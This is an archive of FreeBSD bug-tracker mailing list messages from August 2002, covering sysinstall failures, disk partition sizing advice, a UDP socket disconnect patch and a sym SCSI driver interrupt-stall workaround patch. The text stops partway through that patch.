From owner-freebsd-bugs Sun Aug 18 0:20: 9 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 6A1C237B401 for ; Sun, 18 Aug 2002 00:20:03 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id C8E9043E6A for ; Sun, 18 Aug 2002 00:20:02 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g7I7K2JU045848 for ; Sun, 18 Aug 2002 00:20:02 -0700 (PDT) (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g7I7K2QY045847; Sun, 18 Aug 2002 00:20:02 -0700 (PDT) Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 7FD8737B400 for ; Sun, 18 Aug 2002 00:18:43 -0700 (PDT) Received: from www.freebsd.org (www.FreeBSD.org [216.136.204.117]) by mx1.FreeBSD.org (Postfix) with ESMTP id 4379243E3B for ; Sun, 18 Aug 2002 00:18:43 -0700 (PDT) (envelope-from nobody@FreeBSD.org) Received: from www.freebsd.org (localhost [127.0.0.1]) by www.freebsd.org (8.12.4/8.12.4) with ESMTP id g7I7IgOT026098 for ; Sun, 18 Aug 2002 00:18:42 -0700 (PDT) (envelope-from nobody@www.freebsd.org) Received: (from nobody@localhost) by www.freebsd.org (8.12.4/8.12.4/Submit) id g7I7IgqI026097; Sun, 18 Aug 2002 00:18:42 -0700 (PDT) Message-Id: <200208180718.g7I7IgqI026097@www.freebsd.org> Date: Sun, 18 Aug 2002 00:18:42 -0700 (PDT) From: Jorge Enrique To: freebsd-gnats-submit@FreeBSD.org X-Send-Pr-Version: www-1.0 Subject: i386/41757: sysinstall 4.6.x unstable Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >Number: 41757 >Category: i386 >Synopsis: sysinstall 4.6.x unstable >Confidential: no >Severity: serious >Priority: high >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Sun Aug 18 00:20:01 PDT 2002 >Closed-Date: >Last-Modified: >Originator: Jorge Enrique >Release: 4.6.x >Organization: >Environment: >Description: Sysinstall since release 4.6.x seems unstable and with serious problems, when I try to install with the network mode I first have a problem trying to setup the network, I've done it 100 times and always on the second time I configure it responds, then another problem that I've to say that I also tried this on several machines is that on the network mode when it's downloading it stops with an error and says file system is full, when I do a df -h on the emergence tty I see /dev/md0c is full... and there is no way to install 4.6.x... with a CD 4.6.2 not 4.6 wich was good, instalation I get errors like /stand/cpio no such file or directory checksum error, while a checksum check before burning was good. The network problem I see someone else had it on a french post :(. http://www.freebsd-fr.org/local-fr/www/spec/archives-mail/msg03746.html >How-To-Repeat: >Fix: >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sun Aug 18 7:21:13 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id A490937B400; Sun, 18 Aug 2002 07:21:12 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id 54E9943E6E; Sun, 18 Aug 2002 07:21:12 -0700 (PDT) (envelope-from nork@FreeBSD.org) Received: from freefall.freebsd.org (nork@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g7IELCJU060780; Sun, 18 Aug 2002 07:21:12 -0700 (PDT) (envelope-from nork@freefall.freebsd.org) Received: (from nork@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g7IELAfL060759; Sun, 18 Aug 2002 07:21:10 -0700 (PDT) Date: Sun, 18 Aug 2002 07:21:10 -0700 (PDT) From: Norikatsu Shigemura Message-Id: <200208181421.g7IELAfL060759@freefall.freebsd.org> To: jeannot@augusta.de, nork@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: misc/41690: no sound; using pcm0: port 0xa400-0xa4ff irq 5 at device 9.0 on pci0 Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: no sound; using pcm0: port 0xa400-0xa4ff irq 5 at device 9.0 on pci0 State-Changed-From-To: feedback->closed State-Changed-By: nork State-Changed-When: Sun Aug 18 07:16:45 PDT 2002 State-Changed-Why: This is not FreeBSD's problem, is a cable connectablity problem. So this pr is closed. http://www.freebsd.org/cgi/query-pr.cgi?pr=41690 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sun Aug 18 9:30:13 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 21DC237B400 for ; Sun, 18 Aug 2002 09:30:04 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id C527943E3B for ; Sun, 18 Aug 2002 09:30:03 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g7IGU3JU099012 for ; Sun, 18 Aug 2002 09:30:03 -0700 (PDT) (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g7IGU3g7099011; Sun, 18 Aug 2002 09:30:03 -0700 (PDT) Date: Sun, 18 Aug 2002 09:30:03 -0700 (PDT) Message-Id: <200208181630.g7IGU3g7099011@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Jens Schweikhardt Subject: Re: Re: misc/41711: setup uses a to small disk Reply-To: Jens Schweikhardt Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org The following reply was made to PR misc/41711; it has been noted by GNATS. From: Jens Schweikhardt To: Walter Harms Cc: GNATS Bug Followup Subject: Re: Re: misc/41711: setup uses a to small disk Date: Sun, 18 Aug 2002 18:22:27 +0200 Walter, On Sat, Aug 17, 2002 at 12:14:57PM +0100, Walter Harms wrote: # sorry i am not familar with BSD specify things this is my first encounter # with a bsd installation. Therefor i lack the knowlegde about the configtools # etc. # # After the Std. installation failed i made a minimal installation so i got # a mixture that my hide some important information and does not contain # certain tools. (e.g i have no telnetd or sshd so i cant lock in via network # and need to copy anything by hand). # # I will keep the system in these stade for a while so you can ask specific # thing but next WE (or better before) i plan to reinstall to get at least # a working system. # - How big exactly was the slice(s)? # - How big were the partitions chosen by syinstall's autoconfig option? # # The whole disk was 2G. # ca. 1.3G swap This is waaay to much swap on a 2G disk. How much RAM do you have? The old rule of swap=4*RAM is not valid anymore. swap=RAM is often plenty, you might even run without any swap at all. # Auto configured # # size (1k) usage(%) mountpoint # 128990 39 / # 218670 0 /tmp # 144100 102 /usr # 218670 0 /var I can't believe only 144M were allocated to /usr. Sysinstall is known to have problems when resuming a failed installation. Have you tried starting all over again or resuming a previous install? # - What partition was it running out of space on? # # /usr the 102% was something confusing /usr should at least be 250M (that's what is filled on my system right now, with /usr/src, /usr/ports and /usr/local being different partitions). If you want to compile everything from scratch, go towards 600MB. The >100% is due to 8% being reserved for root, so disks are full at 108%. # - Have you selected to install the ports tree? # i choose the Standard installation # later minimal. Okay, you will be asked for the ports tree after that. It's 30M in /usr/ports but needs a lot of files (i.e. inodes, which are a fixed number per file system). # suggestion: # Teach the installer about minimum requirement. Then grow from there. # I guess the 2G would be big enought to hold the entire CD but the # 1.3G Swapspace brakes the calculation (ca. 780MB ram *2 ). Ah, that's were you got the number from: Swap space is a little tricker, and the rule of "2 * MEM" is simply a best-guess approximation and not necessarily accurate for your intended usage of the system. If you intend to use the system heavily in a server or multi-user application, you may be well advised to increase this size. You may also create swap space on multiple drives for a larger "total" swap and this is, in fact, recommended if you have multiple, fast drives for which such load-balancing can only help overall I/O performance. Well, you have an unusual system: heaps of RAM, tiny disk space. The sysinstall defaults and help text are good for RAM << diskspace. # perhaps you can boot here again and check if the installation # is working. # # An other problem is the whole logic of installing. when the installation # breaks because of lack of space the system tries to install further. # lack of space is a major error and should at least stop and go the main menu. I'm afraid this failure mode is too rare and hard to reproduce on purpose for anyone to investigate. Development of sysinstall is virtually ended in favor of a completely new system, so don't expect to much. It's age shows and it has it's quirks that probably won't get resolved before it is retired. # feel free to ask about more details. i will keep that (broken) state for # the moment. Please reinstall from scratch with less swap (say 256M), that should allocate almost all your extra space to /usr. Regards, Jens -- Jens Schweikhardt http://www.schweikhardt.net/ SIGSIG -- signature too long (core dumped) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sun Aug 18 10: 0:35 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 3ABA637B400; Sun, 18 Aug 2002 10:00:34 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id DE6CE43E72; Sun, 18 Aug 2002 10:00:33 -0700 (PDT) (envelope-from schweikh@FreeBSD.org) Received: from freefall.freebsd.org (schweikh@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g7IH0XJU004911; Sun, 18 Aug 2002 10:00:33 -0700 (PDT) (envelope-from schweikh@freefall.freebsd.org) Received: (from schweikh@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g7IH0XwG004886; Sun, 18 Aug 2002 10:00:33 -0700 (PDT) Date: Sun, 18 Aug 2002 10:00:33 -0700 (PDT) From: Jens Schweikhardt Message-Id: <200208181700.g7IH0XwG004886@freefall.freebsd.org> To: oliver.fromme@heim3.tu-clausthal.de, schweikh@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: misc/11553: /usr/share/misc/latin1 (new file submission) Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: /usr/share/misc/latin1 (new file submission) State-Changed-From-To: feedback->closed State-Changed-By: schweikh State-Changed-When: Sun Aug 18 09:59:15 PDT 2002 State-Changed-Why: Committed with a slight change: used "nbs" instead of the real 0xa0 character for non-breaking space for the second and third table. Thanks! http://www.freebsd.org/cgi/query-pr.cgi?pr=11553 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sun Aug 18 10:51:38 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 5A74C37B405; Sun, 18 Aug 2002 10:51:37 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id C42CB43E7B; Sun, 18 Aug 2002 10:51:36 -0700 (PDT) (envelope-from schweikh@FreeBSD.org) Received: from freefall.freebsd.org (schweikh@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g7IHpVJU018348; Sun, 18 Aug 2002 10:51:31 -0700 (PDT) (envelope-from schweikh@freefall.freebsd.org) Received: (from schweikh@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g7IHpVZN018344; Sun, 18 Aug 2002 10:51:31 -0700 (PDT) Date: Sun, 18 Aug 2002 10:51:31 -0700 (PDT) From: Jens Schweikhardt Message-Id: <200208181751.g7IHpVZN018344@freefall.freebsd.org> To: schweikh@FreeBSD.org, freebsd-bugs@FreeBSD.org, jdp@FreeBSD.org Subject: Re: misc/41180: ldconfig man page amendment Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: ldconfig man page amendment Responsible-Changed-From-To: freebsd-bugs->jdp Responsible-Changed-By: schweikh Responsible-Changed-When: Sun Aug 18 10:50:16 PDT 2002 Responsible-Changed-Why: John, since you have done most commits to ldconfig(8) and ldconfig.c, can you please handle this request? http://www.freebsd.org/cgi/query-pr.cgi?pr=41180 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sun Aug 18 10:58:31 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 34A3537B400; Sun, 18 Aug 2002 10:58:29 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id ECD0743E6E; Sun, 18 Aug 2002 10:58:28 -0700 (PDT) (envelope-from schweikh@FreeBSD.org) Received: from freefall.freebsd.org (schweikh@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g7IHwSJU019415; Sun, 18 Aug 2002 10:58:28 -0700 (PDT) (envelope-from schweikh@freefall.freebsd.org) Received: (from schweikh@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g7IHwRG3019411; Sun, 18 Aug 2002 10:58:27 -0700 (PDT) Date: Sun, 18 Aug 2002 10:58:27 -0700 (PDT) From: Jens Schweikhardt Message-Id: <200208181758.g7IHwRG3019411@freefall.freebsd.org> To: gospos@tekkom.pl, schweikh@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: misc/41064: can't make world: ===> share/doc/papers/kernmalloc, vgrind: permission denied, error code 126 Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: can't make world: ===> share/doc/papers/kernmalloc, vgrind: permission denied, error code 126 State-Changed-From-To: open->feedback State-Changed-By: schweikh State-Changed-When: Sun Aug 18 10:54:52 PDT 2002 State-Changed-Why: Does this problem persist? If yes, delete both /usr/src and /usr/obj completely and try again. You might have some stale files lying around. If the problem persists after this, your system is screwed up in other ways (e.g. I had the -current build fail about a month ago with vgrind -f < /src/current/share/doc/papers/kernmalloc/appendix.t > appendix.ms vgrind: not found *** Error code 127 and it turned out I had corrupted files in the base system.) http://www.freebsd.org/cgi/query-pr.cgi?pr=41064 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sun Aug 18 11:40:11 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 92D2537B400 for ; Sun, 18 Aug 2002 11:40:02 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id E23DA43E65 for ; Sun, 18 Aug 2002 11:40:01 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g7IIe1JU030714 for ; Sun, 18 Aug 2002 11:40:01 -0700 (PDT) (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g7IIe11K030713; Sun, 18 Aug 2002 11:40:01 -0700 (PDT) Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 7879437B400 for ; Sun, 18 Aug 2002 11:30:37 -0700 (PDT) Received: from www.freebsd.org (www.FreeBSD.org [216.136.204.117]) by mx1.FreeBSD.org (Postfix) with ESMTP id 387F443E6A for ; Sun, 18 Aug 2002 11:30:37 -0700 (PDT) (envelope-from nobody@FreeBSD.org) Received: from www.freebsd.org (localhost [127.0.0.1]) by www.freebsd.org (8.12.4/8.12.4) with ESMTP id g7IIUaOT005470 for ; Sun, 18 Aug 2002 11:30:36 -0700 (PDT) (envelope-from nobody@www.freebsd.org) Received: (from nobody@localhost) by www.freebsd.org (8.12.4/8.12.4/Submit) id g7IIUaas005469; Sun, 18 Aug 2002 11:30:36 -0700 (PDT) Message-Id: <200208181830.g7IIUaas005469@www.freebsd.org> Date: Sun, 18 Aug 2002 11:30:36 -0700 (PDT) From: "George V. Neville-Neil" To: freebsd-gnats-submit@FreeBSD.org X-Send-Pr-Version: www-1.0 Subject: kern/41765: UDP socket remains connected after error Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >Number: 41765 >Category: kern >Synopsis: UDP socket remains connected after error >Confidential: no >Severity: critical >Priority: high >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Sun Aug 18 11:40:01 PDT 2002 >Closed-Date: >Last-Modified: >Originator: George V. Neville-Neil >Release: 4.6-STABLE and -CURRENT >Organization: Neville-Neil Consulting >Environment: FreeBSD jchurch.neville-neil.com 4.6-STABLE FreeBSD 4.6-STABLE #4: Sat Jul 13 18:54:53 PDT 2002 root@jchurch.neville-neil.com:/usr/local/src-STABLE/src/sys/compile/JCHURCH i386 >Description: In udp_usrreq.c:udp_output() a UDP socket is temporarily connected to transmit the packet. If an out of mbufs error occurs the socket is never disconnected. >How-To-Repeat: Write a lot of UDP packets while using up a lot of mbufs (this occurs in a piece of propietary software written where I'm working). >Fix: This patch from Jinmei Tatuya (against 4.6 but a similar solution is necessary in -CURRENT): --- udp_usrreq.c.orig Tue Aug 13 13:49:50 2002 +++ udp_usrreq.c Tue Aug 13 13:52:34 2002 @@ -704,9 +704,7 @@ M_PREPEND(m, sizeof(struct udpiphdr), M_DONTWAIT); if (m == 0) { error = ENOBUFS; - if (addr) - splx(s); - goto release; + goto disconnect; } /* @@ -741,7 +739,7 @@ #ifdef IPSEC if (ipsec_setsocket(m, inp->inp_socket) != 0) { error = ENOBUFS; - goto release; + goto disconnect; } #endif /*IPSEC*/ error = ip_output(m, inp->inp_options, &inp->inp_route, @@ -754,6 +752,13 @@ splx(s); } return (error); + +disconnect: + if (addr) { + in_pcbdisconnect(inp); + inp->inp_laddr = laddr; /* XXX rehash? */ + splx(s); + } release: m_freem(m); >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sun Aug 18 12:50:16 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id C53B137B400 for ; Sun, 18 Aug 2002 12:50:14 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id 593FF43E7B for ; Sun, 18 Aug 2002 12:50:14 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g7IJo5JU046549 for ; Sun, 18 Aug 2002 12:50:05 -0700 (PDT) (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g7IJo5iR046548; Sun, 18 Aug 2002 12:50:05 -0700 (PDT) Date: Sun, 18 Aug 2002 12:50:05 -0700 (PDT) Message-Id: <200208181950.g7IJo5iR046548@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Bruce Evans Subject: Re: i386/41723: Copying files to filesystem causes "integer divide fault" and panic. Reply-To: Bruce Evans Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org The following reply was made to PR i386/41723; it has been noted by GNATS. From: Bruce Evans To: Tha KreAture Cc: freebsd-gnats-submit@FreeBSD.ORG Subject: Re: i386/41723: Copying files to filesystem causes "integer divide fault" and panic. Date: Mon, 19 Aug 2002 05:52:11 +1000 (EST) On Sat, 17 Aug 2002, Tha KreAture wrote: > Well. It looks like a change from int to long was enough. Now the system > is acting fine. Er, int is the same as long on i386's. > I understand this is one of the things already fixed in 5.0 ? I don't know if this particular bug was fixed. Some similar bugs were probably fixed without really noticing by changing int and long typedefed types to int64_t. int64_t really is longer than int on i386's :-). Bruce To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sun Aug 18 13:31:36 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id B936F37B400; Sun, 18 Aug 2002 13:31:35 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id 6A69743E6A; Sun, 18 Aug 2002 13:31:35 -0700 (PDT) (envelope-from scottl@FreeBSD.org) Received: from freefall.freebsd.org (scottl@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g7IKVZJU059034; Sun, 18 Aug 2002 13:31:35 -0700 (PDT) (envelope-from scottl@freefall.freebsd.org) Received: (from scottl@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g7IKVYKl059016; Sun, 18 Aug 2002 13:31:34 -0700 (PDT) Date: Sun, 18 Aug 2002 13:31:34 -0700 (PDT) From: Scott Long Message-Id: <200208182031.g7IKVYKl059016@freefall.freebsd.org> To: I-C-H@gmx.de, scottl@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: misc/40090: Missing line in kernel config file Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: Missing line in kernel config file State-Changed-From-To: open->closed State-Changed-By: scottl State-Changed-When: Sun Aug 18 13:26:45 PDT 2002 State-Changed-Why: Closing PR, as it is a feature, not a bug. http://www.freebsd.org/cgi/query-pr.cgi?pr=40090 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sun Aug 18 14:34: 9 2002 Delivered-To: freebsd-bugs@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 8A72437B400; Sun, 18 Aug 2002 14:34:02 -0700 (PDT) Received: from mail.libertysurf.net (mail.libertysurf.net [213.36.80.91]) by mx1.FreeBSD.org (Postfix) with ESMTP id C4C5343E4A; Sun, 18 Aug 2002 14:34:01 -0700 (PDT) (envelope-from groudier@free.fr) Received: from [192.168.1.129] (212.232.46.182) by mail.libertysurf.net (6.5.026) id 3D5F81F70000D5DA; Sun, 18 Aug 2002 23:34:00 +0200 Date: Mon, 19 Aug 2002 01:18:22 +0200 (CEST) From: =?ISO-8859-1?Q?G=E9rard_Roudier?= X-X-Sender: groudier@localhost.my.domain To: Pete French Cc: freebsd-bugs@FreeBSD.ORG, , Subject: Re: kern/37043: Latest stable causes SCSI bus freeze on sym0 when running SMP In-Reply-To: Message-ID: <20020819004743.K200-100000@localhost.my.domain> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=ISO-8859-1 Content-Transfer-Encoding: QUOTED-PRINTABLE Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Sat, 17 Aug 2002, Pete French wrote: > > Synopsis: Latest stable causes SCSI bus freeze on sym0 when running SMP > > State-Changed-From-To: feedback->closed > > State-Changed-By: njl > > State-Changed-When: Fri Aug 16 13:14:57 PDT 2002 > > State-Changed-Why: > > > Workaround is to not share interrupts between ATA and SCSI controllers. > > This is not a complete fix so we should revisit this if others have the > > same trouble in the future. > > Its not specificly ATA controllers - everyone else who had the problem > was sharing interrupts with Ethernet adapters as I recall. But the fix > does work. It is indeed not a fix, but some last chance workaround. (The patch against sym is at the end of this email) Basically, the code tries to detect an interrupt stall and if such seems to happen, it installs the work-around that just polls the interrupt status of the chip 100 times per second. Btw, the ncr had this just hardcoded since day one, but I disliked it for the reason it can hide severe hardware or software flaws. As PCI interrupt trigerring relies on level sensitive logic, an interrupt stall should never happen. The risk is rather an interrupt storm if any interrupt condition is not properly handled by software. IMO, if an interrupt stall happens in PCI, then the cause can be either a flawed/misconfigured piece of hardware that doesn't implement the correct triggerring or a software bug that leaves the interrupt masked somewhere. (IIRC, the problem didn't show up with IO/APIC but only happenned using the legacy interrupt controller.) May-be, users that get their system fixed by this work-around in sym should also report a description of their system hardware and software. This may help find out where the actual flaw actually is. Regards, G=E9rard. PS: The first line of the patch, i.e.: +#define SYM_CONF_HANDLE_INTR_STALL should be removed, if it happens that it will be worthwhile to commit this code, in order to allow to conditionnaly compile the workaround. --------------------- PATCH -------------------------- --- sym_hipd.c.orig=09Sun Jun 9 18:37:50 2002 +++ sym_hipd.c=09Sun Jun 9 16:36:07 2002 @@ -1,3 +1,7 @@ +#define SYM_CONF_HANDLE_INTR_STALL +#if 0 +#define DEBUG_INTR_STALL +#endif /* * Device driver optimized for the Symbios/LSI 53C896/53C895A/53C1010 * PCI-SCSI controllers. @@ -1922,6 +1926,17 @@ =09struct sym_tblmove abrt_tbl;=09/* Table for the MOV of it =09*/ =09struct sym_tblsel abrt_sel;=09/* Sync params for selection=09*/ =09u_char=09=09istat_sem;=09/* Tells the chip to stop (SEM)=09*/ + +#ifdef SYM_CONF_HANDLE_INTR_STALL +=09int stall_state;=09/* State of the algorithm */ +=09int stall_count;=09/* Number of intr stall observed */ +=09u_long intr_count;=09/* Real interrupt counter */ +=09u_long intr_prevc;=09/* Previous counter seen from clock hanlder */ +=09u_long clock_curr;=09/* Our clock in ticks */ +=09u_long clock_stall;=09/* Clock value at a possible stall */ +=09struct callout_handle clock_ch;/* Kernel timer alchemy :) */ +#define SYM_CLOCK_TICK=09((hz+99)/100) +#endif }; #define HCB_BA(np, lbl)=09 (np->hcb_ba + offsetof(struct sym_hcb, = lbl)) @@ -2513,6 +2528,10 @@ static void sym_nvram_setup_target (hcb_p np, int targ, struct sym_nvram *= nvp); static int sym_read_nvram (hcb_p np, struct sym_nvram *nvp); +#ifdef SYM_CONF_HANDLE_INTR_STALL +static void sym_clock_handler(void *arg); +#endif + /* * Print something which allows to retrieve the controler type, * unit, target, lun concerned by a kernel message. @@ -4216,6 +4235,9 @@ static void sym_intr(void *arg) { =09if (DEBUG_FLAGS & DEBUG_TINY) printf ("["); +#ifdef SYM_CONF_HANDLE_INTR_STALL +=09++((hcb_p)arg)->intr_count; +#endif =09sym_intr1((hcb_p) arg); =09if (DEBUG_FLAGS & DEBUG_TINY) printf ("]"); =09return; @@ -9509,6 +9531,13 @@ =09=09goto attach_failed; =09/* +=09 * No comments for this one. :) +=09 */ +#ifdef SYM_CONF_HANDLE_INTR_STALL +=09np->clock_ch =3D timeout(sym_clock_handler, (caddr_t)np, SYM_CLOCK_TICK= ); +#endif + +=09/* =09 * Sigh! we are done. =09 */ =09return 0; @@ -10410,3 +10439,91 @@ } #endif=09/* SYM_CONF_NVRAM_SUPPORT */ + +#ifdef SYM_CONF_HANDLE_INTR_STALL +/* + * The below code tries to detect interrupt stalls. + * + * It assumes that an interrupt condition raised + * in the chip interrupt status that is not serviced + * for 0.2 second is a possible stall. + * + * If such happens 5 times, it installs a work-around + * that forces interrupt service each time an interrupt + * condition is present in the chip interrupt status. + */ + +static void sym_clock_handler(void *arg) +{ +=09int s; +=09hcb_p np; +=09u_char istat; +=09int intr_prevc; + +=09np =3D arg; +=09if (!np) +=09=09return; + +=09s =3D splcam(); + +=09/* +=09 * Update our clock and interrupt counter copy. +=09 */ +=09intr_prevc =3D np->intr_prevc; +=09np->intr_prevc =3D np->intr_count; +=09np->clock_curr +=3D SYM_CLOCK_TICK; + +=09/* +=09 * Read the chip interrupt status. +=09 */ +=09istat =3D INB (nc_istat) & (INTF|SIP|DIP); + +=09/* +=09 * Try to detect interrupt stalls. +=09 */ +=09switch(np->stall_state) { +=09default: +=09case 0:=09/* Wait for the first unserviced interrupt condition */ +=09=09np->stall_count =3D 0; + +=09case 2:=09/* Wait for subsequent ones */ +=09=09if (istat) { +=09=09=09np->clock_stall 